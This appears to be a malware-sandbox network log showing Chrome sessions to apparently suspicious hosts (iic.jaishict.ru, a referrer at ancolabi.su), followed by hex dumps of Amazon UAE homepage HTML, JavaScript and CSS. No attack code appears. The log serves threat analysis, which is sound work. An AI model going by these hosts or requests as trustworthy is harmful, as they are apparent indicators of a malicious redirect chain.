                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:23 UTC610INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:22 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l7N9YMExLPIWDBN8xZlD%2B6g%2FIuTx17vC0EV1fiyuixAKJO%2BPctKesRqWHo3XDYxJ5ZDaTTH9Ujl%2BAAd5i%2BuFfkUD9oA1pOV3Q7l5A5MytaELtXAi6NSvbHNCRDkgoCfB1g0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                CF-RAY: 8b20c7909b638cbf-EWR
                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:23 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 11
                                                                                                                                                                                                                                                                2024-08-12 13:23:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                26192.168.2.449860188.114.96.34437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:23 UTC394OUTGET /pitpuuzhnmxqkshihrkpdjjmzyQNhrLDWZIJAADSBTPAPAJPLCDIIUZ HTTP/1.1
                                                                                                                                                                                                                                                                Host: iic.jaishict.ru
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:24 UTC608INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:24 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xMSDiubV3%2Fqsxr3n8y4uJRFG3umUzWTq5DmP%2B1SwAeNwNx5d%2FGl9WZ1qd27JZLvs8xSDB8wcWirLA0zSy2XYGfTa1CS4hkRRJOlBabixh3roBZgsLa4Y4hao82l%2Bxbsb0Ok%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                CF-RAY: 8b20c799d93b423a-EWR
                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:24 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 11
                                                                                                                                                                                                                                                                2024-08-12 13:23:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                27192.168.2.44985952.222.236.764437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:23 UTC679OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                Host: www.amazon.ae
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                Referer: https://nkoc4.ancolabi.su/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:24 UTC1506INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Content-Type: text/html;charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Server: Server
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:24 GMT
                                                                                                                                                                                                                                                                Vary: Content-Type,Accept-Encoding,User-Agent
                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                x-amz-rid: C37SFEY0GDXEZ5HDEVRN
                                                                                                                                                                                                                                                                set-cookie: session-id=262-5692979-3003613; Domain=.amazon.ae; Expires=Tue, 12-Aug-2025 13:23:24 GMT; Path=/; Secure
                                                                                                                                                                                                                                                                set-cookie: session-id-time=2082787201l; Domain=.amazon.ae; Expires=Tue, 12-Aug-2025 13:23:24 GMT; Path=/; Secure
                                                                                                                                                                                                                                                                set-cookie: i18n-prefs=AED; Domain=.amazon.ae; Expires=Tue, 12-Aug-2025 13:23:24 GMT; Path=/
                                                                                                                                                                                                                                                                X-UA-Compatible: IE=edge
                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                Expires: -1
                                                                                                                                                                                                                                                                content-security-policy-report-only: default-src 'self' blob: https: data: mediastream: 'unsafe-eval' 'unsafe-inline';report-uri https://metrics.media-amazon.com/
                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                Accept-CH-Lifetime: 86400
                                                                                                                                                                                                                                                                Content-Language: en-AE
                                                                                                                                                                                                                                                                X-XSS-Protection: 1;
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                Accept-CH: ect,rtt,downlink,device-memory,sec-ch-device-memory,viewport-width,sec-ch-viewport-width,dpr,sec-ch-dpr,sec-ch-ua-platform,sec-ch-ua-platform-version
                                                                                                                                                                                                                                                                Content-Security-Policy: upgrade-insecure-requests;report-uri https://metrics.media-amazon.com/
                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=47474747; includeSubDomains; preload
                                                                                                                                                                                                                                                                X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                Via: 1.1 3d34e163f3f1a0c4a397ad818b79a810.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA56-P4
                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                X-Amz-Cf-Id: AZk63DCxgQ0LM87jSAYSwLJj9M1bVLyxOfxSIVO78eAsWIlV8iKU0Q==
                                                                                                                                                                                                                                                                2024-08-12 13:23:24 UTC701INData Raw: 32 62 36 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 61 65 22 20 63 6c 61 73 73 3d 22 61 2d 6e 6f 2d 6a 73 22 20 64 61 74 61 2d 31 39 61 78 35 61 39 6a 66 3d 22 64 69 6e 67 6f 22 3e 3c 21 2d 2d 20 73 70 3a 66 65 61 74 75 72 65 3a 68 65 61 64 2d 73 74 61 72 74 20 2d 2d 3e 0a 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 76 61 72 20 61 50 61 67 65 53 74 61 72 74 20 3d 20 28 6e 65 77 20 44 61 74 65 28 29 29 2e 67 65 74 54 69 6d 65 28 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 0a 3c 21 2d 2d 20 73 70 3a 65 6e 64 2d 66 65 61 74 75 72 65 3a 68 65 61 64 2d 73 74 61 72 74 20 2d 2d 3e 0a 3c 21 2d 2d 20 73 70 3a 66 65 61 74 75 72 65 3a 63 73 6d 3a 68 65 61 64
                                                                                                                                                                                                                                                                Data Ascii: 2b6<!doctype html><html lang="en-ae" class="a-no-js" data-19ax5a9jf="dingo">... sp:feature:head-start --><head><script>var aPageStart = (new Date()).getTime();</script><meta charset="utf-8"/>... sp:end-feature:head-start -->... sp:feature:csm:head
                                                                                                                                                                                                                                                                2024-08-12 13:23:24 UTC8194INData Raw: 31 66 66 61 0d 0a 74 69 6d 69 7a 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 21 2d 2d 20 73 70 3a 66 65 61 74 75 72 65 3a 63 73 6d 3a 68 65 61 64 2d 6f 70 65 6e 2d 70 61 72 74 32 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 0a 77 69 6e 64 6f 77 2e 75 65 5f 69 68 62 20 3d 20 28 77 69 6e 64 6f 77 2e 75 65 5f 69 68 62 20 7c 7c 20 77 69 6e 64 6f 77 2e 75 65 69 6e 69 74 20 7c 7c 20 30 29 20 2b 20 31 3b 0a 69 66 20 28 77 69 6e 64 6f 77 2e 75 65 5f 69 68 62 20 3d 3d 3d 20 31 29 20 7b 0a 0a 76 61 72 20 75 65 5f 63 73 6d 20 3d 20 77 69 6e 64 6f 77 2c 0a 20 20 20 20 75 65 5f 68 6f 62 20 3d 20 2b 6e 65 77 20 44 61 74 65 28 29 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 64 29 7b 76 61 72 20 65 3d 64 2e 75 65 3d 64 2e 75 65
                                                                                                                                                                                                                                                                Data Ascii: 1ffatimization -->... sp:feature:csm:head-open-part2 --><script type='text/javascript'>window.ue_ihb = (window.ue_ihb || window.ueinit || 0) + 1;if (window.ue_ihb === 1) {var ue_csm = window, ue_hob = +new Date();(function(d){var e=d.ue=d.ue
                                                                                                                                                                                                                                                                2024-08-12 13:23:24 UTC2134INData Raw: 38 34 66 0d 0a 73 74 49 64 3a 65 2c 74 72 61 6e 73 69 74 69 6f 6e 54 79 70 65 3a 22 73 6f 66 74 22 7d 29 2c 70 28 22 6d 61 72 6b 22 2c 22 74 72 61 6e 73 69 74 69 6f 6e 53 74 61 72 74 22 2c 62 29 29 3b 61 2e 74 61 67 28 22 61 6a 61 78 2d 74 72 61 6e 73 69 74 69 6f 6e 22 29 7d 64 2e 75 65 69 6e 69 74 3d 28 64 2e 75 65 69 6e 69 74 7c 7c 30 29 2b 31 3b 76 61 72 20 61 3d 64 2e 75 65 3d 64 2e 75 65 7c 7c 7b 7d 3b 61 2e 74 30 3d 68 2e 61 50 61 67 65 53 74 61 72 74 7c 7c 64 2e 75 65 5f 74 30 3b 61 2e 69 64 3d 64 2e 75 65 5f 69 64 3b 61 2e 75 72 6c 3d 64 2e 75 65 5f 75 72 6c 3b 61 2e 72 69 64 3d 64 2e 75 65 5f 69 64 3b 61 2e 61 3d 22 22 3b 61 2e 62 3d 22 22 3b 61 2e 68 3d 7b 7d 3b 61 2e 73 3d 31 3b 61 2e 74 3d 7b 7d 3b 61 2e 73 63 3d 7b 7d 3b 61 2e 69 65 6c 3d 5b
                                                                                                                                                                                                                                                                Data Ascii: 84fstId:e,transitionType:"soft"}),p("mark","transitionStart",b));a.tag("ajax-transition")}d.ueinit=(d.ueinit||0)+1;var a=d.ue=d.ue||{};a.t0=h.aPageStart||d.ue_t0;a.id=d.ue_id;a.url=d.ue_url;a.rid=d.ue_id;a.a="";a.b="";a.h={};a.s=1;a.t={};a.sc={};a.iel=[
                                                                                                                                                                                                                                                                2024-08-12 13:23:24 UTC8194INData Raw: 31 66 66 61 0d 0a 6f 70 65 6e 2d 70 61 72 74 32 20 2d 2d 3e 0a 3c 21 2d 2d 20 73 70 3a 66 65 61 74 75 72 65 3a 61 75 69 2d 61 73 73 65 74 73 20 2d 2d 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 2e 6d 65 64 69 61 2d 61 6d 61 7a 6f 6e 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 49 2f 31 31 45 49 51 35 49 47 71 61 4c 2e 5f 52 43 7c 30 31 65 35 6e 63 67 6c 78 79 4c 2e 63 73 73 2c 30 31 6c 46 32 6e 2d 70 50 61 4c 2e 63 73 73 2c 34 31 32 73 48 7a 2d 56 39 35 4c 2e 63 73 73 2c 33 31 33 37 58 78 76 4d 53 38 4c 2e 63 73 73 2c 30 31 47 5a 45 76 43 35 57 49 4c 2e 63 73 73 2c 31 31 47 45 50 71 58 61 72 74 4c 2e 63 73 73 2c 30 31 71 50 6c 34 68 78 61 79 4c 2e 63 73 73 2c 30 31 74 69 30 71 2b 32 32 31
                                                                                                                                                                                                                                                                Data Ascii: 1ffaopen-part2 -->... sp:feature:aui-assets --><link rel="stylesheet" href="https://m.media-amazon.com/images/I/11EIQ5IGqaL._RC|01e5ncglxyL.css,01lF2n-pPaL.css,412sHz-V95L.css,3137XxvMS8L.css,01GZEvC5WIL.css,11GEPqXartL.css,01qPl4hxayL.css,01ti0q+221
                                                                                                                                                                                                                                                                2024-08-12 13:23:24 UTC12865INData Raw: 33 32 33 39 0d 0a 33 64 28 29 7d 2c 74 6f 75 63 68 53 63 72 6f 6c 6c 69 6e 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 28 2f 57 69 6e 64 6f 77 73 68 6f 70 7c 61 6e 64 72 6f 69 64 7c 4f 53 20 28 5b 35 2d 39 5d 7c 5b 31 2d 39 5d 5b 30 2d 39 5d 2b 29 28 5f 5b 30 2d 39 5d 7b 31 2c 32 7d 29 2b 20 6c 69 6b 65 20 4d 61 63 20 4f 53 20 58 7c 53 4f 46 54 57 41 52 45 3d 28 5b 35 2d 39 5d 7c 5b 31 2d 39 5d 5b 30 2d 39 5d 2b 29 28 2e 5b 30 2d 39 5d 7b 31 2c 32 7d 29 2b 2e 2a 44 45 56 49 43 45 3d 69 50 68 6f 6e 65 7c 43 68 72 6f 6d 65 7c 53 69 6c 6b 7c 46 69 72 65 66 6f 78 7c 54 72 69 64 65 6e 74 2e 2b 3f 3b 20 54 6f 75 63 68 2f 69 29 7d 2c 69 6f 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 28 2f 4f 53 20 5b 31 2d 39 5d 5b 30 2d 39
                                                                                                                                                                                                                                                                Data Ascii: 32393d()},touchScrolling:function(){return e(/Windowshop|android|OS ([5-9]|[1-9][0-9]+)(_[0-9]{1,2})+ like Mac OS X|SOFTWARE=([5-9]|[1-9][0-9]+)(.[0-9]{1,2})+.*DEVICE=iPhone|Chrome|Silk|Firefox|Trident.+?; Touch/i)},ios:function(){return e(/OS [1-9][0-9
                                                                                                                                                                                                                                                                2024-08-12 13:23:24 UTC16384INData Raw: 33 66 66 61 0d 0a 6f 73 74 2d 61 73 73 65 74 73 20 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 0a 23 67 77 2d 64 65 73 6b 74 6f 70 2d 68 65 72 6f 74 61 74 6f 72 2c 23 67 77 2d 64 65 73 6b 74 6f 70 2d 68 65 72 6f 74 61 74 6f 72 20 2e 61 2d 63 61 72 6f 75 73 65 6c 2d 76 69 65 77 70 6f 72 74 7b 68 65 69 67 68 74 3a 33 30 30 70 78 7d 23 67 77 2d 64 65 73 6b 74 6f 70 2d 68 65 72 6f 74 61 74 6f 72 2e 74 61 6c 6c 7b 7a 2d 69 6e 64 65 78 3a 30 7d 23 67 77 2d 64 65 73 6b 74 6f 70 2d 68 65 72 6f 74 61 74 6f 72 2e 74 61 6c 6c 2c 23 67 77 2d 64 65 73 6b 74 6f 70 2d 68 65 72 6f 74 61 74 6f 72 2e 74 61 6c 6c 20 2e 61 2d 63 61 72 6f 75 73 65 6c 2d 63 6f 6e 74 72 6f 6c 73 7b 6d 61 78 2d 68 65 69 67 68 74 3a 32 33 30 70 78 7d 23 67 77 2d 64 65 73 6b 74 6f 70 2d 68 65 72 6f 74 61 74
                                                                                                                                                                                                                                                                Data Ascii: 3ffaost-assets --><style>#gw-desktop-herotator,#gw-desktop-herotator .a-carousel-viewport{height:300px}#gw-desktop-herotator.tall{z-index:0}#gw-desktop-herotator.tall,#gw-desktop-herotator.tall .a-carousel-controls{max-height:230px}#gw-desktop-herotat
                                                                                                                                                                                                                                                                2024-08-12 13:23:24 UTC11308INData Raw: 0d 0a 32 63 32 32 0d 0a 65 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 64 29 7b 64 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 3d 74 79 70 65 6f 66 20 64 3f 64 3a 74 68 69 73 2e 6c 65 6e 67 74 68 3b 69 66 28 22 5b 6f 62 6a 65 63 74 20 41 72 72 61 79 5d 22 3d 3d 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 74 68 69 73 29 29 72 65 74 75 72 6e 20 62 2e 63 61 6c 6c 28 74 68 69 73 2c 61 2c 64 29 3b 76 61 72 20 68 3d 5b 5d 2c 6c 3b 6c 3d 74 68 69 73 2e 6c 65 6e 67 74 68 3b 61 3d 61 7c 7c 30 3b 61 3d 30 3c 3d 61 3f 61 3a 4d 61 74 68 2e 6d 61 78 28 30 2c 6c 2b 61 29 3b 76 61 72 20 6d 3d 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 64 3f 4d 61 74 68 2e 6d 69 6e 28 64 2c 6c 29 3a 6c 3b 30 3e 64 26 26 28 6d 3d 6c 2b 64
                                                                                                                                                                                                                                                                Data Ascii: 2c22e=function(a,d){d="undefined"!==typeof d?d:this.length;if("[object Array]"===Object.prototype.toString.call(this))return b.call(this,a,d);var h=[],l;l=this.length;a=a||0;a=0<=a?a:Math.max(0,l+a);var m="number"==typeof d?Math.min(d,l):l;0>d&&(m=l+d
                                                                                                                                                                                                                                                                2024-08-12 13:23:24 UTC3200INData Raw: 63 37 39 0d 0a 6f 73 74 2d 61 73 73 65 74 73 20 2d 2d 3e 0a 3c 21 2d 2d 20 73 70 3a 66 65 61 74 75 72 65 3a 65 6e 63 72 79 70 74 65 64 2d 73 6c 61 74 65 2d 74 6f 6b 65 6e 20 2d 2d 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 65 6e 63 72 79 70 74 65 64 2d 73 6c 61 74 65 2d 74 6f 6b 65 6e 27 20 63 6f 6e 74 65 6e 74 3d 27 41 6e 59 78 54 76 56 5a 6a 51 33 6b 41 6b 58 77 59 46 6c 50 59 64 6c 45 4a 68 6a 64 2b 51 66 49 6d 4d 65 5a 6e 54 46 56 4b 78 2b 4a 6b 70 76 4a 2f 43 47 6e 47 70 66 71 79 71 4e 61 73 79 52 71 5a 64 32 72 4e 4b 68 51 6a 58 33 63 72 58 72 46 4f 55 51 68 64 79 69 47 4c 31 4c 50 5a 2f 6b 45 53 52 52 30 59 61 2f 74 30 44 53 45 4d 51 58 4a 74 78 47 6a 71 70 6a 6c 70 52 69 72 50 39 50 6c 63 44 39 2b 52 69 74 6c 5a 33 75 48 79 41 31 4f 2b 79 79 4a 4e
                                                                                                                                                                                                                                                                Data Ascii: c79ost-assets -->... sp:feature:encrypted-slate-token --><meta name='encrypted-slate-token' content='AnYxTvVZjQ3kAkXwYFlPYdlEJhjd+QfImMeZnTFVKx+JkpvJ/CGnGpfqyqNasyRqZd2rNKhQjX3crXrFOUQhdyiGL1LPZ/kESRR0Ya/t0DSEMQXJtxGjqpjlpRirP9PlcD9+RitlZ3uHyA1O+yyJN
                                                                                                                                                                                                                                                                2024-08-12 13:23:24 UTC768INData Raw: 32 66 39 0d 0a 64 5d 26 26 63 28 7b 74 79 70 65 3a 22 76 69 73 69 62 6c 65 22 7d 29 7d 76 61 72 20 6e 3d 22 3b 20 65 78 70 69 72 65 73 3d 22 2b 28 6e 65 77 20 44 61 74 65 28 2b 6e 65 77 20 44 61 74 65 2b 36 30 34 38 45 35 29 29 2e 74 6f 47 4d 54 53 74 72 69 6e 67 28 29 2c 6d 3d 22 74 62 22 2c 66 2c 61 3d 6c 2e 75 65 7c 7c 7b 7d 2c 6b 3d 61 2e 70 61 67 65 56 69 7a 26 26 61 2e 70 61 67 65 56 69 7a 2e 65 76 65 6e 74 26 26 0a 61 2e 70 61 67 65 56 69 7a 2e 70 72 6f 70 48 69 64 3b 61 2e 61 74 74 61 63 68 26 26 28 61 2e 61 74 74 61 63 68 28 22 63 6c 69 63 6b 22 2c 63 29 2c 61 2e 61 74 74 61 63 68 28 22 6b 65 79 75 70 22 2c 63 29 2c 6b 7c 7c 28 61 2e 61 74 74 61 63 68 28 22 66 6f 63 75 73 22 2c 63 29 2c 61 2e 61 74 74 61 63 68 28 22 62 6c 75 72 22 2c 70 29 29 2c
                                                                                                                                                                                                                                                                Data Ascii: 2f9d]&&c({type:"visible"})}var n="; expires="+(new Date(+new Date+6048E5)).toGMTString(),m="tb",f,a=l.ue||{},k=a.pageViz&&a.pageViz.event&&a.pageViz.propHid;a.attach&&(a.attach("click",c),a.attach("keyup",c),k||(a.attach("focus",c),a.attach("blur",p)),
                                                                                                                                                                                                                                                                2024-08-12 13:23:24 UTC817INData Raw: 33 32 61 0d 0a 68 65 61 64 2d 63 6c 6f 73 65 20 2d 2d 3e 0a 3c 21 2d 2d 20 73 70 3a 66 65 61 74 75 72 65 3a 73 74 61 72 74 2d 62 6f 64 79 20 2d 2d 3e 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 61 2d 61 75 69 5f 37 32 35 35 34 2d 63 20 61 2d 61 75 69 5f 61 31 31 79 5f 32 5f 37 35 30 35 37 38 2d 63 20 61 2d 61 75 69 5f 61 31 31 79 5f 36 5f 38 33 37 37 37 33 2d 63 20 61 2d 61 75 69 5f 61 31 31 79 5f 73 72 5f 36 37 38 35 30 38 2d 74 31 20 61 2d 61 75 69 5f 61 6d 7a 6e 5f 69 6d 67 5f 39 35 39 37 31 39 2d 63 20 61 2d 61 75 69 5f 61 6d 7a 6e 5f 69 6d 67 5f 67 61 74 65 5f 39 35 39 37 31 38 2d 63 20 61 2d 61 75 69 5f 6b 69 6c 6c 73 77 69 74 63 68 5f 63 73 61 5f 6c 6f 67 67 65 72 5f 33 37 32 39 36 33 2d 63 20 61 2d 61 75 69 5f 70 63 69 5f 72 69 73 6b 5f 62 61 6e 6e
                                                                                                                                                                                                                                                                Data Ascii: 32ahead-close -->... sp:feature:start-body --><body class="a-aui_72554-c a-aui_a11y_2_750578-c a-aui_a11y_6_837773-c a-aui_a11y_sr_678508-t1 a-aui_amzn_img_959719-c a-aui_amzn_img_gate_959718-c a-aui_killswitch_csa_logger_372963-c a-aui_pci_risk_bann


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                28192.168.2.449863151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:24 UTC821OUTGET /images/I/41-WpIOxHtL._RC%7C71S7yoZEbpL.css,415rb7zC-GL.css,11GB7tDtz6L.css,31MqpFX13CL.css,31YZpDCYJPL.css,21pkK7OQMnL.css,41Xj8tZc2XL.css,110Nj+wUGYL.css,31OvHRW+XiL.css,01R53xsjpjL.css,11EKggV-DlL.css,415g7iDx4VL.css,11qTzxZ0Y5L.css_.css?AUIClients/NavDesktopUberAsset&JoiNCr6G HTTP/1.1
                                                                                                                                                                                                                                                                Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:24 UTC674INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 369479
                                                                                                                                                                                                                                                                Content-Type: text/css
                                                                                                                                                                                                                                                                X-Amz-IR-Id: 32a45be0-31fd-4f80-a0cc-bceebc624116
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Tue, 29 Aug 2023 18:22:47 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Expires: Sun, 17 Jul 2044 21:34:52 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Age: 1651320
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:24 GMT
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kiad7000028-IAD, cache-ewr18139-EWR
                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:24 UTC1378INData Raw: 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 2c 23 68 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 7b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30 3b 72 69 67 68 74 3a 30 3b 62 6f 74 74 6f 6d 3a 30 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 30 30 30 7d 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 64 69 76 2c 23 68 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 64 69 76 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 7d 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 2e 68 6d 65 6e 75 2d 76 69 73 69 62 6c 65 2c 23 68 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 2e 68 6d 65 6e 75 2d 76 69 73 69 62 6c 65 7b 76 69 73 69 62 69 6c 69
                                                                                                                                                                                                                                                                Data Ascii: #accountMenu-container,#hmenu-container{position:fixed;top:0;left:0;right:0;bottom:0;visibility:hidden;z-index:100000}#accountMenu-container div,#hmenu-container div{display:flex}#accountMenu-container.hmenu-visible,#hmenu-container.hmenu-visible{visibili
